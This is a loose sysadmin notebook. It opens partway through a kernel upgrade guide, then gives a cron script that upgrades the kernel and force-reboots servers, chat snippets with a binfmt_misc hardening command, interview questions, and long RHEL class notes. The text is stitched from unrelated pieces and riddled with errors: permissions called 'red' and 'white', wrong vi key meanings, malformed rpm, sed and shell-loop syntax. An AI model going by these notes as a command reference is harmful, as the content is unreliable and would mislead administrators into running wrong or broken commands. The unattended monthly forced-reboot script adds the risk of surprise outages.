initrd-2.6.35.4.img already exists. root@server [/boot]# ------------ 12. vi /boot/grub/menu.lst or /etc/grub.conf : //For me the entries has automatically put in this file like : ------------ root@server [/usr/src/linux-2.6.35.4]# cat /etc/grub.conf # grub.conf generated by anaconda # # Note that you do not have to rerun grub after making changes to this file # NOTICE: You have a /boot partition. This means that # all kernel and initrd paths are relative to /boot/, eg. # root (hd0,0) # kernel /vmlinuz-version ro root=/dev/hda3 # initrd /initrd-version.img #boot=/dev/hda default=1 timeout=5 splashimage=(hd0,0)/grub/splash.xpm.gz hiddenmenu title CentOS (2.6.35.4) root (hd0,0) kernel /vmlinuz-2.6.35.4 ro root=/dev/hda3 initrd /initrd-2.6.35.4.img title CentOS (2.6.18-194.8.1.el5) root (hd0,0) kernel /vmlinuz-2.6.18-194.8.1.el5 ro root=/dev/hda3 initrd /initrd-2.6.18-194.8.1.el5.img title CentOS (2.6.18-128.el5) root (hd0,0) kernel /vmlinuz-2.6.18-128.el5 ro root=/dev/hda3 initrd /initrd-2.6.18-128.el5.img root@server [/usr/src/linux-2.6.35.4]# ------------ 13. reboot //enter this command at the konsole. 14. Check the server whether it comes online and check uname -r //If it does not come please contact DC to load the server from old kernel and sort the problem. ============================== That's it. Try :) HOST=$(/bin/hostname) /usr/bin/yum upgrade kernel -y LATEST=$(/bin/rpm -q kernel |tail -n1|sed -e 's/kernel-//') CURRENT=$(/bin/uname -r) if [ $LATEST == $CURRENT ] then echo "" else printf " Hello, Latest kernel on server $HOST is INSTALLED. To set that kernel as current kernel, server $HOST is being rebooted now. Please check server till it comes online. Thanks, Support Team -------------------------------------------------------- " | mail -s "Kernel Upgraded on $HOST" kernel@minmaxgroup.com /usr/bin/wall "SERVER is REBOOTED as KERNEL is UPGRADED" /usr/bin/wall "SERVER is REBOOTED as KERNEL is UPGRADED" /usr/bin/wall "SERVER is REBOOTED as KERNEL is UPGRADED" /usr/bin/wall "SERVER is REBOOTED as KERNEL is UPGRADED" /sbin/shutdown -rf now fi ****************************************************************************************************** How to set it up this script on server ? SSH to server 1. cd ~3gteam 2. Create new file with the file name : pico kscript 3. Paste above whole script in the file. 4. exit and save the changes and make 755 permissions to that file chmod 755 kscript 5. now open the root cron file pico /var/spool/cron/root and add the cron command like at the bottom : 0 0 1 * * /home/3gteam/kscript > /dev/null 2>&1 save the changes and exit. 6. ll /home/3gteam/kscript -rwxr-xr-x 1 root root 1475 Mar 14 04:10 /home/3gteam/kscript* this is to confirm the path for the script. 7. and finally restart the cron service from the server. /etc/init.d/crond restart Cron have set to run the script in a month once from each server. ************************************************************************************************* run the kscript manually on 1st and second page servers for kernel upgrade [10:32:36 AM] vulgar: and any errors for upgrade place ticket to dc [10:32:53 AM] APS6: how to run ? [10:33:02 AM] vulgar: cd /home/3gteam [10:33:05 AM] vulgar: and ./kscript [10:33:17 AM] APS6: thanx :) ********************************************************* [1:08:25 PM] bluffer: ok [1:17:07 PM] bluffer: On ghostso after upgrading kernel, Run the following [1:17:11 PM] bluffer: uname -m [1:17:19 PM] bluffer: if the result is : [1:17:23 PM] bluffer: uname -m x86_64 [1:17:39 PM] bluffer: i mean only "x86_64 " [1:17:50 PM] bluffer: then you need to do one thing. [1:18:09 PM] bluffer: run the following command [1:18:14 PM] bluffer: "echo ':32bits:M::\x7fELF\x01::/bin/echo:' > /proc/sys/fs/binfmt_misc/register" [1:18:40 PM] bluffer: getting it ? [1:26:39 PM] bluffer: if you find 64 bit server [1:26:47 PM] bluffer: run that command [1:26:52 PM] bluffer: login to WHM [1:27:14 PM] bluffer: check if any other user has normal shell [1:27:31 PM] bluffer: if yes then make it jailed shell Universal Word - Hindi Lexicon English to Hindi: Version 3.1 http://www.cfilt.iitb.ac.in/~hdict/webinterface_user/dict_search_user.php ***************************************************************************** http://www.shabdkosh.com/language convertor http://translate.google.com/#cat /var/log/lfd.log |grep 81.131.108.80Linux interview question. 1. what is ddos attack and how to prevent? 2. What is file system? 3. What is IP spoofing? 4. Port Numbers. 5. How to work FTP and what is use of port 20 and 21? 6. What is kernerl? 7. How many tables in iptables? 8. What are shell variables? 9. What is 'inode'? 10. What are the main differences between RHEL4 & RHEL5? 11. What is difference between imap and pop? 12. Describe linux boot sequence: 13. What different between port and protocols? 14. What is the difference between UDP and TCP internet protocols? 15. What is a zombie process? 16. What is difference between daemon and process? 17. Logs location. 18. difference between unix and linux? 19. What are the main differences between RHEL4 & RHEL5? 20. What are seven fields in the /etc/passwd file? 21. What is a filesystem? 22. What command is used to remove the password assigned to a group? 23. Which of the following commands will show a list of the files in your home directory including hidden files and the contents of all subdirectories? 24. Which file defines all users on your system? 25. What is the minimum number of partitions you need to install Linux? 26. What is a PID? 27. Difference between Hard Link and Soft Link in Linux? 28. What is Raid? The different types and Levels of Raid? 29. What is NFS? What is its purpose? 30. What does nslookup do? 31. What is .htaccess? 32. How many field in crontab? 33. Which log contains information on currently logged in users? 34. What is DNS? 35. How do you create a swapfile? 36. How to get the mysqlbackup and restore? 37. Where is located hardware configuration file in linux? 38. Whats the advantage of using ssh over telnet? 39. How to assign temporary IP address to lan-card? 40. How to recover grub on linux server? 41. How to setup log rotation on linux server? 42. How to see only sub-directory in directory? 43. How to see only files in directory? 44. How to replace the word without opening the file? RH 033 -- REDHAT ENTERPRISE LINUX ESSENTIALS * BASIC COMMANDS: * BASIC COMMAND PROMPT # date --> it’s displayed u a date with time # cal 09 1990 --> it’s displayed u calendar of month which u want. # cal 2010 --> to displayed to u year calendar Shift + page up & page down --> pages will be up and down Passwd change ‘ Virtual console of linux Ctrl + alt + f2 --> second virtual console Ctrl + alt + f1--------- f6 they are virtual login Ctrl + alt + f7 --> starting GUI (graphical user interface) F1 to f6 are CLI ( command line interface ) Ctrl + f1 active Redhat # clear :-- it is clear the screen # exit :-- it is use to # logout INTRODUCTION :- Unix – history 1st version -- bell lab Ken Thomson & Denies Ritchie Unix principle : -- 1) every thing is a file 2) configuration file text format 3) single small purpose programme . 4) all prog’s can be changed . * linux :-- 1991 linus journals features :-- 1) multitasking 2) multi user 3) wide hardware support 4) login : two types i) text based:-- virtual console ( 6 types ) ii) graphical based:- alt +clt +f1 1st virtual console to alt+clt+f6 6th virtual console login : root password : redhat command :-- # date date +% any character A to Z # cal 1 year Scroll --> shift + pageup or pgdown Ex. # cal 06 1983 # clear # start x Start button in window = application in linux Trash = r.b ( w ) Computer ( l ) = any computer ( w) Root home ( 2) = my document (w) # passwd --> to change password # exit --> logout # ctrl + alt --> back space FUI to VC * R.H.C.E * 3 modules RH - 033 RH -133 RH - 253 Linux essential linux sys administrator Network administrator Basic utilities installation n/w config different server Tools of command 11 units --> 32 hours conf sys 11- unit 32-hour 18 unit & 32 hours * 9. vim : advanced editor Vi : visual editor Vim-vim—improved Command mode vi : 3 modes 1. common mode 2. insert mode 3. exit mode – exit editor starting vi editor # vi /vim filename Esc+I :-- insert test Esc+wq! :- it is used for writing & quiting Esc+w! :- only write but does not exit Esc+q! :- only quit Esc+shift+o :-- add a blank line Esc + o :-- add a blank line below current line Esc + a :-- append after elevent apphabate . Esc + h :-- 1 alphabet back Esc+ j :-- 1 line below Esc + <k :- 1 line above Esc + l :- 1 alphabet forward Esc + w :-- switches in next word Esc +b :-- Delete a line Esc dd :--to delete the line Esc cc :-- replace the line Esc yy :-- for copies line Esc p :-- for the pest the line Esc cl :-- replace 1 alpha / character Esc dl :-- to delete a letter Esccw :-- replace word Esc u :-- undo the current action Esc : senonu :-- cancelled the line num Esc : set number:-- set number of our para esc : se nu:-- root :- it is the name of user # :-- start u’r command from Ctrl+alt + back space 4. getting help in linux:-- level of help :-- i) wha is <command > e.g --> cal ii) <command> --help e.g cal –help iii) E.g # man cal [it shows u manual ] Manual selection : & sections 1) user command 2) system cal 3) library 4) special files 5) file formats 6) games 7) miscellaneous 8) administrator command 5. info <command> (detail) # Make what is (use before what is ) Q – quite man page # useradd bob (any name of) # passwd bob (any name passwd) # ls – to show list of files & properties (GMT –green which mean time) * how to configure a panel :- right click on panel (taskbar) * how to configure control panel :-- * system--> preferences --> choos any * change password :-- system--> pref –ablout me 8th aug 2007 * browsing the file system :-- / (root of the linux file system) /root /etc * commands:-- 1) # pwd --> print working directory 2) # cd <dirname> --changing dir In directory of files .. colour of files – * white --> normal /text file --> user file * Red --> special file --> for special function * Green --> executable file .exe * Blue --> directory 3) # cd - --> switch back previous dir 4) # cd --> switch back to home dir 5) # cd.. --> switch to home dir * creating a directory:-- # mkdir <dir name > (to make a dir which any u want) # rm <dir name> (to remove empty dir) * option to remove dir :-- -- I --> interactive -- r --> recursive -- f --> forcefully * to remove all contains of dir:- # rm - rf abc <dir name> :less :-- show less dir list # ls –l | less * creating empty files :-- # touch a , b , c * to file with containt # cat > filename Ctrl + D --> to save the file * to see the containt with file # cat filename * to create a combination file :- # touch {jan,feb,mar} {11,22,33} Combination character string * to remove file :-- # rm –I jan_11 /rm_r_filename C press y-yes or n-no # rm r jan 22 # fi kap * types of ls * # ls –l --> show long listing of containt * # ls -a --> to see hidden file * # ls –lh --> view long listing in human readable fashion. 9th aug 2007 * user group & permission :-- organization—(companies) depts.--> pag elect makt x y z p q r linux UID bob student * less /etc/passwd ( user database information) 1. user 5. extra information 2. password files 6. home dir of user 3. UID co. 7. login shell 4. GID * grub database info is stored in # cat /etc/groupfile 1) group name 2) group passwd 3) GID of groups 4) Diff user of group. * password database info is stored in :-- first two column:-- 1)- user name 2) encrypted passwd * permission :-- 10 columns in permission 3 types of permission 1) r --> red permission 2) w --> white permission 3) x --> execute permission c formats: 1 2 3 4 5 6 7 8 9 10 D r w x r w x r w x 4 2 1 Dir user group other U G O * types of permission 1) symbolic --> r,w,x #chmod g + w “tm” # chmod u-x, g-x, 0-x “tm” 2) numerical :-- have same values R = 4 W = 2 X = 1 e.g :- * to change permission numerically :-- # chmod 660 “filename” To change into # chmod 440 “file name” * Changing into ownership :-- To change user -- Command : 1) # chown –R bob – “filename”. 2) # chgrp -R student “filename”. # chown bob:bob x For * # less /etc/shadow Passwd database information stored in this file. 13th aug 2008 * Searching a string 1) esc: /this <text> esc : this --> removing the highlight 2) esc : nohl 3) replacing the particular string Esc : 1,$ s /-------/------/ g 4) replacing a particular string in specific line esc:1,2 s /this/This/ g * transferring 1 file to another file # vi file 1 # vi file 2 S-1)-- # file1 S-2) # esc:rfile2 : copy all content file 1 to file2 * Set an indent Esc: set auto indent : mark an indent same as previously Esc: set ai * remove indent * esc: set no auto indent * esc: se noai set text wrap esc: set textwrap = 70 esc : set textwrap = 0 to turn off text wrap 7)setting a srap margin- esc: set wrapmargin = 70 esc : set wrapmargine = 0 * opening a two window in Vim # vim –o file1 file2 To move one window to 2nd window Ctrl+w+ ( at a time up down arrow) Ctrl+w+v Ctrl+w * to open 2 window in vi:- * s-1 # vi file1 * s-2 # esc:n texttry * to switch between the 2 windows esc:n# * inserting date/any command at current cursor position * esc: r <space> ! date --- --- --- --- --- - ls –l esc: 1,2w <space >> filen * to perform any task without quit esc : ! <any command> esc: 1,2w >> texttry— esc : 50 % switch to half of file esc : 100 % switches end of file esc : 1 % switches to start of file * to deleting a sentence 1) forward c) : replace the next sentences d) : delete y) : yank/copy c( : replace the sentence before d( : delete y( : yank/copy * deleting a paragraph c{ --> replace the para after current para d{ --> delete the para after current para y{ --> the para after current para c{ --> replace the para current para d{ --> delete the para current para y{ --> yank/copy the para current para * using the bash shell :-- # bash shell ( bourn again shell) s.h. bourn shell C shell (csh) Enhance c shell (tesh) * command line shortcut * 1) * is 1st globing character * - 0 or any instance of any character [ 0 - 9] any no 0 – 9 (between) 2) ? single instance of any character 3) [ a b c] – excluding char’s from parenthesis # Ls l [a b c] 4) [a b c] – excluding char’s from parenthesis * using a tab key u can use any command with pressing tab . * editing command line ctrl + a -- moves to start of command ctrl + e -- moves to end of command ctrl + k -- deleting a place w here u want to erase ctrl +u -- to deleting a previous . * for GUI terminal 1) ctrl + shift + T --> opens a new terminal in GUI 2) ctrl+ shift+ pgup --> shifting a terminal 3) ctrl + shift + pgdown --> switch u’r terminal backward. 4) ctrl+ shift+ c --> copy copy a command Ctrl + shift +v --> paste a command which terminal u want. * # history --> it will be show u the command displayed the list of it * --> to run a command from history # ! -- any no. in history page . # !! -- repeats the last command # ! l -- execute the command from l # ! c – execute a command from starting with c # !-10 run a command 10 step back $ is use to display a variable value Ex: # x = 10 --> echo $x --> show 10 # ! magical shebang sequence For shell script to execute to following S-1 : in vi make a file with extension as .sh S-2 : # ! /bin/bash 1st line of script S-3 : write u’r programme S-4 : :wq! S -5 : chmod u+x <filename >.sh S-6 : # ./ <filename> .sh e.g #!/bin/bash This programme displayed date Echo “the date is $ (date)” X=10 Echo $x :wq! # chmod u+x testing.sh # ./testing.sh # cp file1 x ~ /xyz # cd xyz # ls –l ‘a>--> 20th aug 2007 Chapter—7 standard input output and pipes * standard default :-- 1) standard input (STDIN) keyboard by default file descriptor NO: 0 2) standard output (STDOUT) :-- terminal windows y default file descriptor NO:1 3) standard error (STDERR) :-- terminal window by default file descriptor NO:2 * redirection --> use of file instead of default redirection operator :-- 1) command --> filename : send STDOUT to file name # ls –l > list 2) command >> filename 3) command 2> filename :- it only hakes the error sends a standard error to a file 4) command 2>> filename :-- appends a STDERR to file 5) command <file :-- # ls –l </etc/passwd * for non root users :-- 1) # find /etc/-- filename passwd 2) # find /etc/-- filename passwd > out e.g # cat out 3) # find /etc/ filename passwd >> out #* $ tr ‘ a-z ’ ‘A -Z’ (tr=translate ) * sending STDOUT to programme user of pipes ( | ) 1) less command 1 | less e.g # ls –l | less 2) mail Ls –l | mail –s “list ” bob@ station2.example.com ( * mail : viewing mail ) 3) lpr :-- printing) # s –l | lpr # find /etc/ name passwd 2>> dev/null * combining STDOUT & STDERR &> : reduce STDOUT & STDERR # find > etc – name passed &> find out 2> &1 : redirector STDERR to STDOUT via pipe # Cal 2007 ; cal 2008 | lpr --> this for combining two command e.g # for name in bob student > do > ADD = “$name @ station2.example.com >MESSG = “CALL URGENT” > echo $ MESSG | mail –s “ call ” $ ada > done * redirecting STDIN mail –s “x y z” root@server2.example.com 21st aug 2008 UNIT – 8 TEXT PROCESSING TOOLS:- Tee - it allows to run multiple command at a time # command 1| tee f1 command | tee file2 # ls –l | tee f1| cat file | teef2 1) # head : starting line of files by default it shows 1st 10 lines # head /etc/passwd # head -n - 20 /etc/passwd 2) # tail : it’s shows bottom 10 line of file by default 10 # tail –n -15 /etc/passwd /var/log/message # tail -f /var/log/message -f --. Follow the file Ctrl + c * finding particular string :- # grep : general regular expression process # grep ‘bob’ /etc/passwd # grep –n ‘bob’ /etc/passwd # grep -v ‘bob’ /etc/passwd * wc : word count # wc xyz : count no of character no of lines & no of word . # wc - w xyz -- count word - c xyz -- count character - l xyz -- count line # cut : for cutting particular char . # cut -d : f1 /etc/passwd # cut -d : f1 , 3 /etc/passwd # cut -d : f -5 /etc/passwd * sort # sort -t : k3 /etc/passwd (alphabetically) # sort -t : -k3 /etc/passwd # sort -t : k-3 -n –r /etc/passwd (numerically) * aspell :-- check for spelling mistake in its fiel # cat > file # aspell check file * look :-- looks for particular word from directory # look exer * uniq :-- single / duplicator instance e.g uniq - c file1 uniq :-- count the number of unique & duplicator lines # uniq -d cats :-- find the instance of duplicate line # uniq -u cats :- single instance of line * diff :-- it’s allow to find different # diff cats pets e.g. # different xyz conf station2 xyz.conf –station3 * create 2 file with cat command # paste -d : file file2 * sed :- stream editors # sed ‘$/cats/pets/g’ cats # sed ‘1,2 r /cats/pets/g’ cats # sed -e ‘s/cats/pets/g’ -e S /dogs/cows/g’ cats # exec ls # PID -- process ID # tty -- 1 2 3 4 5 6 Tty0 tty1 tty3 tty4 tty5 tty6 ? – process in running but its not visible S – sleeping process can be wakeup by particular command Ss -- swap space Ss + -- running into swap space R + -- running * signals : -- it is information passed to process by issuing command # signals can be verified on the basic of name & number No NAME function 1) signals 15 TERM terminal killing 2) 9. KILL terminal immediately 3) 1 HUP re.organize.conf fine * termination of process * PID - kill <any no of PID> 3429 * Command – kill -- 9 (ps -U) # KILL -9 [pid no.] # kill -9 process id is 3412 * setting priority :- priority has value between 20 to 19 by default 0 - 20 it is highest priority 19 is a lowest priority # nice -n -20 ls (before process running) # top : # renice -9 –p 4343 PID (after process running) # ps –o command which are running * bg & fq background & four ground process (bg % 1 , - fa) # jobs: * schedual task :- # at 1300 > ls -l > cal ctrl +d # at -l shows the list of schedule task # atq # at Thursday 1800 * removing schedule atrm -: remove all the jobs # cronetab –e 0-59 0-23 0-31 1-12 0-6 # min hour dom month dow ( command ls -l) 0 4 10 2 0,1 :wq! Equal not equal # test “sx” = “$y” && echo “------” // echo “----” 22nd aug 2007 /root/.bash_history 9. configuring the bash shell :- Variables System variable user define variable (caps) generally in | case | | Local environmental Set | less env| less # echo # HISTFILESIZE -100 # echo # HISTFILE #echo $ lines {25} #echo $ columns 80 #echo $ EUID 0 #echo $ HOME /root #echo $ USER #echo $ HostName --> server1.example.com #echo $LANG --> en_us.VTF -8 #echo $ path #echo $ PS 1 prompt screen 1 \u@ \h \w \$ PS 1 = “REDHAT LINUX------>” PS 1 = “REDHAT LINUX------> \d” PS 1 = “REDHAT LINUX------> \d\u” PS 1 = “REDHAT LINUX------>\d \u \h” PS 1 = “REDHAT LINUX------> \d\u\h\w” Set | less * alias : -- for printing the particular key command in # alias l = “ls -l” # unalias l (~) home directory * bash shell running commands :-- 1. it breaks line into word 2. expands aliases 3. expands { } 4. expands ~ tilde 5. expands $ 6. expands command var . $ ( ) 7. 8. expand blogs * ? [ a,b,c] 9. find out redire ton I/O path # which date 2 types of SHELL --------------------------- Boot itself login shell no login shell after giving Particular command # vi /etc/profile # vi /etc/profile.d # vi ~ /bash * # vi .bshc * Alias l = “ ls -l” :wq! #Read p “enter u’r name”: (1st name ) ( 2nd name)” first last #Echo “your 1st name is $ FIRST & 2nd name is LAST” #read -p “enter 5 value ” v1 v2 v3 v4 v5 # echo “1st value = $ v1” # echo “2nd value = $ v2” # echo “3rd value = $ v3” 13. investing & managing process Process :-- it is set instruction loaded inside memory Component Exec THREAD DID Memory - management Process Parent process child process logout parent process child process # pstree | les --> shows the tree structure of process # ps -a --> the command on current terminal # ps –x --> # ps –l --> shows the list of process # ps -ll --> it shows the process will run by the user 27th aug 2007 Ch - 10 Basic System configuration tool * protocols :-- a set of particular rules to be obeyed by the networks * TCP /IP :-- TCP—transmission control protocol IP – internet protocol * DHCP :-- dynamic control protocol * IP Address :-- it is address of particular machine * Subnet-mask:-- all the machine having a same address & network number * managing ethernet connection :-- 1) eth .: 0 eth 0:1 2) eth : 1 eth 0:2 * ifconfig eth no --> to check the interface * ifdown eth no --> to shutdown / stop the interface * if up eth no --> to start the interface * DHCP :- * DNS – (Domain Name Service) Server: (server1.example.com) Gatway :255:255:255:0 192.168.0.x class-c 172.168.x.x class –b 112.x.x.x class –a * network configuration file :-- * ethernet devices :-- 1) configuration file for particular ethernet # vi /etc/sysconfig/network –script /ifcfg - ethx Line :-- 1 . it gives a company name or who can be manufacture 2 .device name 3. broadcast address 4. hardware network it is given by manufacturer itself (eth device) 5. IP address --> it gives ip address 6. netmask :- it will be belong to class c network 7. network :-- 8.ONBOOT = yes bring uploading boot = yes not bring up during boot=no 9. gateway :-- particular gateway for particular IP address 10. TYPE = ethernet – it is type of card (ethernet wireless) * 2 list of all interface device :-- # vi /usr/share/doc/initscript -* /sysconfig.txt * device :-- it means the name of particular device H/W address * Boot Proto :- where the network should take it address that was Ip address * Gateway :-- it is recognize to make host other 0 * Onboot :-- start when booting y/n * Yser CTL :-- should be set to y to allow non root user to use the ifconfig Command * Type :-- type of ethernet / wireless what type of network interface card 3) global setting of network configuration file – # vi /etc/sysconfig/network i) networking_IPV6 = yes to enable or disable networking an it is normally set to yes ii) HOSTNAME = yes Server1.example.com iii) networking = yes iv) NIS domain 4) DNS configuration file : IMP # vi /etc/resolve.conf It is stored in it * printing in linux # pr install.log| less # vi /etc/cups/printer.conf Conf-file of printer # ls stat – static for printing # lpr install.log # system-config-date This is the configure a date set the date & time # vi /etc/sysconfig/network-script/ifcfg – eth0 28th aug 2007 /etc/bash.rc Unit -14 Advance topic in user group & permission # useradd <name> # userdel < name > # usermod -c “this is new user” <name> Vi /etc/ passwd S Suid : special UID S Sgid : special GID T Sticly bit : SUID : 4 SGID : 2 Sticky bit : 1 * umask : - used for adding special permission # umask 022 Directories default permission 777 File default permission 666 # chmod < 0551 > <file> * extra commands :- # su -bob - switch to bob user # who am I - to show user # users - to show information abt user # groups #who #w #ID Unit 15 -- Linux Filesystem In Depth * system has partition : each partition has ( unique) filesystem Ext-2 old partition ( old version) Ext -3 linux has used ext-3 filesystem 1) speed 2) Stability ext -3 feature 3) storage * Inode :-- index node * file system consists of inode table * Inode table consist of list of Inode number # ls - l | list allthe inod number Effect of CP command on inode number Cp - copy # cp file1 file2 Effect of MV command on inode number Mv_ file1 / = moves content to destination # mv file1 file2 - rename [change] 4) effect of RM command on inode number # rm file1 [ it’s freed that inode] The inode num are free after this command * (whenever uerase one file that u cant retrieve the data in soft link) * link :-- 1) hard link -- lm file 1 file2 2) soft link - ( symbolic) ( u cant span between partition) # ln -s file1 file2 We cannot retrieve the data in this line # rm -f file Access the cd/ floppy linux For cd 1) # mount /media/cdrecorder # cd /media/cdrecorder # ls # cp _______/ root # umount /media/cdrecorder 2) # mount /media/floppy floppy 3) # mount /media/sd -4 pendrive * archive compress creating # tar -cvf tar.tmp /tmp create verbos file detail info listing # tar -tvf tar.tmp extracting # tar -xvf tar.tmp * Zip # gunzip -v install.log gz-zipfile # gunzip -v install.log.gz # b zip2 -v install.log .bz2 Zip file with exte-n # b unzip -v install.log bz2 #tar -czvf tar.tmp /tmp Create extract # tar - xzcf tar.tmp # df -H --> it will show u a free space in H disk Human readable fashion # df -h # du -s # du -s #du -sh # # mtools --> this command is used for floppy drive accessing. # mdir --> to see the dir/files in floppy * 14 Network client 1) firefox - it’s start of internet i) speed ii) multipal tab browsing iii) excellent cookie management ( it’s is a special type of file) iv) block popues v) support for latest plugines 2) links :-- it is managed by yahoo.com # links http://www.yahoo.com # links - dump http://www.yahoo.ocm # links – source http://www.yahoo.com # vi /etc/resolve.conf 3) ping :-- helps to see connectivity in n/w # ping 192.168.0.1 # ping station1.example.com # ping -c 3 192.168.0.1 4)host :-- it converts hostname to Ip add # host station1 *# dig :-- same as host command but in more detail # dig station1 5) traceroute :- trace relative path traceroute 192.168.0.254 6) ssh secure shell # ssh 192.168.0.4 (it allows to u a configure a system) # exit #dhclient - --> to retain u’r connectivity # service sshd restart --> it’s start u’r ssh command 7) FTP:-- file transfer protocol # ftp station1 # ftp ftp/> cd pub ftp/> ls ftp/> quit ftp/> mget xyz --ftp get ftp/>mput ftp/> quit 8) SCP :- secure copy # scp abc 192.168.0.1 # scp abc 192.168.0.1:/etc 10) Wget :-- get files via HTTP or FTP # wget http://www.redhat.com/traiing /index.html Above command used for to copy index html page to our system then use this command 4th sep 2007 1) * IF loop : Lt- less than equal to Gt- greter than equal to Le- less than equal to I= 1 Ne – not equal to If [ $i – ne 10] Eg – equal to Then Ge – greter than / equal to number Echo “not equal 10” Else Echo “equal to 10” Fi :wq! * I = “ost “ --> string If [$t = “ost”]; Then Echo “equal” Else Echo “not equal ” Fi I=3 case 1) echo “one”;; 2) echo “two”;; 3) echo “invalid” ;; esac 2) for loop:- I = 10 For I in $ (seq 110) Do Echo “$i”; Done 3) dowhile loop:- I = 100 While [$ -i- ge !] Do Echo $i I = ‘exp $ i-i’ Done Lt - less than Gt – greter than Le – less than equal to Ne – not equal to Eq – equal to Ge – greater than or equal to IMP for exam – INSTALLATION :-- Anaconda : is redhat enterprise linux installer 1) kikstart :-- speed of installation 2) rescue mode :- command line troubles shooting 3) Upgrade:- upgrade by anaconda * 2 modes of working of anaconda 1) it start the installation the process 2) carries the installation * functions :-- 1) it initialize installation 2) parser I/P from command 3) it detect the drive ( hardware) 4) it detect extra drive 5) if=t sets language keyboard layout & networking 6) Start networking if required for installation * modes of Installation installation purpose devices 1) CDROM 2) HDD 3) HTPP 4) FTP 5) NFS -- network file system (faster than other) * initrd img : image required by kernal * vm linuz : compress UR linux kernal Start of installation Linux text * first screen language (tab-space) ur Ok * linux server directory /var/ftp/pubn/RHEL5 Next -- welcome screen skip Partition type screen * create custom layout ok 1) 2) 3) 1) Mount point - / Ext - 3 type Size MB 5000 2) mount point - /home Ext -3 Size mb 300 4) swap - size - 2000mb * boot loder configuration GRUB Not use for frub password * MBR – master boot record Hostname configuration As it is * automatically via DHCP * Asia Calcutta for timezone Root password --> redhat * * package selection screen Customize softeare selection 1) Administrative tools 2) DNS name server 3) Development library 4) Development tools 5) Editor 6) FTP Server 7) GNOME desktop Environment 8) Graphical internet 9) Graphic 10) Legacy network server 11) Mail server 12) Network server 13) Primary support 14) Server configuration tool 15) Sound and video 16) System tools 17) Text base internet 18) Web server 19) Windows file server 20) Windows system * dependency check --> take out the CD ( GRUB :- what do find out the boot sequence where it is start) 1 RH – 133 1. SYSTEM INITIALASATION:- date: 6th sep2007 1) POST:- power on self test 2) BIOS :- ( Basic Input Output System) 3) POST :- Power On Self Test 4) CMOS :- ( Complementary metal oxide semiconductor ) 5) Boot sequence :- CD , Hard Disk It searches the device 6) Boot Device :- HDD 7) MBR :- master boot record 8) GRUB :- grand unified boot loader 9) Kernel :- core of operating system i)system initialization ii) process management iii) memory management iv) Network Initialization 10) Vmlinuz :-- computer u’r linux kernel 11) Initrd.img :- 12) Init sequence :- Login prompt * Init Sequence # vi /etc/rc.sysinit 1) Activate UDVE & se Linux 2) Kernal parameters sets 3) Sets the system clock 4) Enable Swap partition ( SWAP – virtual memory) 5) sets HOST name 6) Root file system check & remount 7) Active RAID & LVM 8) Enable disk quota 9) Check & mount other filesystem 10) Cleans up stail lock & PID files # vi /etc/inittab 0. halt ( do NOT set init default to this) 1. single user mode 2. multiuser , without NFS (the same as 3. if you do not have networking ) 3. Full multiuser mode 4. unused 5. X11 ( graphical mode) 6. Reboot ( do not set initdefault to the) * id:3:initdefault --> that means full multiuser mode # init 0 # init 6 # init 5 (xen-virtualisation) # vi /etc/rc.local --> it execute after all the other init script # vi /etc/rc.d/rc Runlavel changes This file is responsible for starting/ stopping services when the runlevel changes. # vi /etc/motd --> type the message of the day # vi /etc/issue – 1. Name 2. Kernel \r on an\ i686 (intel686) # vi /boot grub/grub/grub.conf Default = 1 Timeout = 5 Password -- md5 Splash Image = (hd 0,1) Cha 2 : PACKAGE MANEGMENT Redhat package manager :-- RPM Features :-- * it allows to install s/w (software) * allows to upgrade s/w * allows to remove s/w * allows to Repair s/w * many other RPM package Install :-- # mkdir –p /mnt/server1 --> to make a directory 1st # mount –t nfs 192.168.0.254:/var/ftp/pub /mnt/server1 --> then mount the nfs location # cd /mnt/server1/RedHat/RPMS --> then change the directory # ls -> list # RPM –ivh zsh-html<tab> --> Install the package u want * how to upgrade package # rpm –Uvh zsh –htm<tab> * how to fresher /repair # rpm –fvh zsh-html <tab> * how to erase /remove the package # rpm –E zsh-html * how to see a package install in system # rpm –qa (query all) * hwo to list of file required for packages # rpm –ql - (query list ) * How to see information regarding the respective package. # rpm-qi <package name> * how to see a virsion of package # rpm –q * how to see a older or newer version of package # rpm –q - - change log <pack name>) * how to see a script used while installing #rpm –q – script <pack name> * how to see utility given by the package # rpm –q -- provides Note: (dependency different between RPM & YUM package installing YUM should be resolve.) * INSTALL THE PACKAGE BY YUM * YUM # cd /etc/yum.repos.d/ # ls # rm # cd # ftp server1 Name : ftp Password: ftp/> ls ftp/> cd pub ftp/> mget server1.repo mget –yes ftp/> quit # cp server1.repo /etc/yum.repos.d/ # yum install <package name> # yum list <package name> # Yum –y <package> Cha :- 3 It’s core part of o/s 1) system initialization 2) process management 3) memory management 4) security 5) sets up network & file system [ protocol] module .: it is short extension of kernal. * feature :-- 1) reduces memory footprint 2) easy of uptime 3) flexibility :-- load /unload # lsmod -- list of modual # modprobe-- it is add a modual # rmmod <modual > for removing # ls /lib/moduals/<tab>/kernal/drivers --> It’s is used for 2 see the driver of u’r system # modinfo (cd rom) --> it used for regarding info about the partition modual. # modinfo ISDN # /dev:- used for device drivers * 3 attribute regarding /dev 1) major number 2) minor number 3) device Type i) ii) Block type character device Used to stored deta use a deta sterm # ls –l /dev/ | less Device available by kernel * udev :- is daemon used to --> administrator /dev (it is background process not visible) * /proc :- it is used to configure or set a configuration of kernal # cat /proc/cpuinfo--> details /information of CPU # cat /proc/meminfo- --> complete information of system memory # cat /proc/modules --> info of modules # cat /proc/iomem --> input & output memory required # cat /proc/ioports --> # cat /proc/partitions--> # cat /proc /version --> version of linux # vi /etc/modprobe.conf --> Configuration file containt par assistance setting that apply to modules commonly loaded onto the system. # free :-- it is used to see a memory uses . # vmstat – virtual memory static’s to see the by this command # Uname –R --> to see the virsion #sysctl –a –use to change a value kernal setting # sysctl –w fs. leases –enable = o # ls /lib/modules/2.6.18.8.el5/kernel/drivers 11th sep 07 SMP : kernel user 4 GB RAM PAE : 4*4 split memory process as well as : kernal each user 4 GB Xen : virtulasition Unit 5 . User Administration # vi /etc/passwd : user database # vi /etc/group : group database # vi /etc/shadow : passwd database # useradd ost # passwd ost * how to add a comment # usermod –c “I am king ” ost * how to change in directory # usermod –d /root ost * locking password # usermod -L ost * unlocking password # usermod -U ost Id ost Group # usermod -g root ost * adding different groups # usermod -G root ,bin ost (user name) * change login shell :- # usermod –s /bin/sh ost /bin/bash * how to change a login name # usermod -l ram ost * delete a user # userdel -l ram # userdel - r ram ( r –recursiverly with home directory) * adding a group : # groupadd ost # groupmod -n abc ost # groupdel - abc ( deleting a group) # groupmod -g 2000 abc # vi /etc/group # Group -r * ageing policies # chage 